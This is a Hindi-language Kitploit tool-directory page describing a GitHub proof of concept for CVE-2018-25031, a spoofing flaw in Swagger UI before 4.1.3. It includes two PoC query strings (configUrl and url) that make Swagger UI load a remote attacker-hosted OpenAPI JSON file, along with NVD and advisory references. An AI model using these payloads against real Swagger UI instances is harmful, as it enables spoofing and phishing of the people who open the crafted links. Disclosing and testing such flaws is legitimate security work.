Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2018-25031 — .json और .yaml फ़ाइलें CVE-2018-25031 का शोषण करने के लिए उपयोग की जाती हैं। | Kitploit
उपकरण/GitHubGitHub/afine-com/cve-2018-25031
फ़िशिंग उपकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षाAPI सुरक्षा
GitHubafine-com/cve-2018-25031

CVE-2018-25031

.json और .yaml फ़ाइलें CVE-2018-25031 का शोषण करने के लिए उपयोग की जाती हैं।

रिपॉजिटरी देखें
21111 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2018-25031

विवरण:

Swagger UI 4.1.3 से पहले एक दूरस्थ हमलावर को स्पूफिंग हमले करने की अनुमति दे सकता है। किसी पीड़ित को एक क्राफ्टेड URL खोलने के लिए राजी करके, एक हमलावर इस कमजोरी का उपयोग करके दूरस्थ OpenAPI परिभाषाओं को प्रदर्शित कर सकता है।


हमले से पहले स्क्रीनशॉट:

PoC:

root@kitploit:~
/index.html?configUrl=https://raw.githubusercontent.com/afine-com/CVE-2018-25031/main/poc.json
/index.html?url=https://raw.githubusercontent.com/afine-com/CVE-2018-25031/main/poc.json

हमले के बाद PoC स्क्रीनशॉट:

संदर्भ:

https://nvd.nist.gov/vuln/detail/CVE-2018-25031
https://deps.dev/advisory/GHSA/GHSA-cr3q-pqgq-m8c2

Swagger UI 3.52.1 पर परीक्षण किया गया
टूल डाउनलोड करें